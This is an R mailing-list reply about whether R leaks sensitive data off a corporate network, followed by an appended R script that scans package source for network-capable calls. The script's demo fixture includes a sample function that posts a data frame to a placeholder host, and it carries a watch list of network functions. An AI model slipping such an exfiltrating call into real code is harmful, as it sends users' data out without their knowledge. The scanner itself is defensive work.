[R] security using R at work

Barry Rowlingson
Wed Aug 8 18:10:30 CEST 2018


On Wed, Aug 8, 2018 at 4:09 PM, Laurence Clark
<Laurence.Clark using healthmanltd.com> wrote:
> Hello all,
>
> I want to download R and use it for work purposes. I hope to use it to analyse very sensitive data from our clients.
>
> My question is:
>
> If I install R on my work network computer, will the data ever leave our network? I need to know if the data goes anywhere other than our network, because this could compromise its security.
>
> Is there any chance the data could go to a server owned by 'R' or anything else that's not immediately obvious, but constitutes the data leaving our network?

You are talking mostly to statisticians here, and if p>0 then there's
"a chance". I'd say yes, there's a chance, but it's pretty small, and
would only occur through stupidity, accident or malice.

 In the ordinary course of things your data will be on your hard disk,
or on your corporate network drives, and only exist between your
corporate network server and your PC's memory. R will load the data
into that memory, do stuff with it in that memory, and write results
back to hard disk. Nothing leaves the network this way.

However... R has facilities for talking to the internet. You can save
data to Google Docs spreadsheets, for example, but you'd have to be
signed in to Google, and have to type something like:

 > writeGoogleDoc(my_data, "secretdata.xls")

That covers "stupid". You should know that Google Docs are on Google's
servers, and Google's servers aren't on your network, and your secret
data shouldn't go on Google's servers.

Accidents happen. You might be working on non-secret data which you
want to save to Google Docs, and accidentally save "data1" which is
secret instead of "data2" which is okay to be public. Oops. You sent
it to Google. Accidents happen.

"malice" would be if someone had put code into R or an add-on package
that you use that sends your data over the network without you
knowing. For example maybe every time you fit a linear model with:

 lm(age~beauty, data=people)

R could be transmitting the data to hackers. But the chance of this is
very small, and I don't think any malicious code has ever been
discovered in R or the 12000 add-on packages downloadable from CRAN.
Doesn't mean it hasn't been discovered yet or won't be in the future.

It used to be said that the only machine safe from hackers was one
unplugged from the network. But now hackers can get to your machine
via malicious USB sticks, keyboard loggers, and various other nasties.
The only machine safe from hackers is one with the power off. But take
the power plug out because a wake-on-lan packet could switch your
machine on remotely....

Barry
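
Added example, not part of the original message: a static triage scan for the "malice" case described above, which parses (without running) the R source of an unpacked package and reports expressions that reference network-capable calls. The watch list, the `scan_source` name and the demo file are assumptions of this example.

```r
# Watch list (an assumption of this example; extend it for your environment).
net_syms <- c("url", "download.file", "socketConnection", "browseURL",
              "curl", "curl_download", "curl_fetch_memory",
              "httr", "httr2", "RCurl", "GET", "POST", "PUT", "getURL",
              "system", "system2")  # system*() can shell out to curl/wget

# Parse (never evaluate) every .R file under `dir` and report each top-level
# expression that references a watched symbol. Limits: names passed as
# strings (do.call("url", ...)) and compiled code are not seen, so a clean
# result is triage, not proof.
scan_source <- function(dir) {
  files <- list.files(dir, pattern = "\\.[Rr]$", recursive = TRUE,
                      full.names = TRUE)
  rows <- list()
  for (path in files) {
    exprs <- parse(path, keep.source = TRUE)
    refs  <- attr(exprs, "srcref")
    for (i in seq_along(exprs)) {
      # all.names() also returns both sides of pkg::fun, so "httr" and
      # "POST" are each matched in httr::POST(...)
      found <- intersect(all.names(exprs[[i]]), net_syms)
      if (length(found))
        rows[[length(rows) + 1]] <- data.frame(
          file = basename(path),
          line = as.integer(refs[[i]])[1],
          refs = paste(found, collapse = ", "))
    }
  }
  if (length(rows)) do.call(rbind, rows) else NULL
}

# Constructed sample "package" source, written to a temp dir for the demo.
demo <- file.path(tempdir(), "demo_pkg", "R")
dir.create(demo, recursive = TRUE, showWarnings = FALSE)
writeLines(c(
  "fit <- function(d) lm(age ~ beauty, data = d)",
  "fit2 <- function(d) {",
  "  httr::POST('https://example.invalid/collect', body = d)",
  "  lm(age ~ beauty, data = d)",
  "}"), file.path(demo, "models.R"))

print(scan_source(dirname(demo)))
```

Point `scan_source()` at the `R/` directory of a source tarball unpacked with `untar()` before installing it; many legitimate packages will show hits, so each one is a prompt to read that function, not a verdict.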

> Thank you
>
> Laurence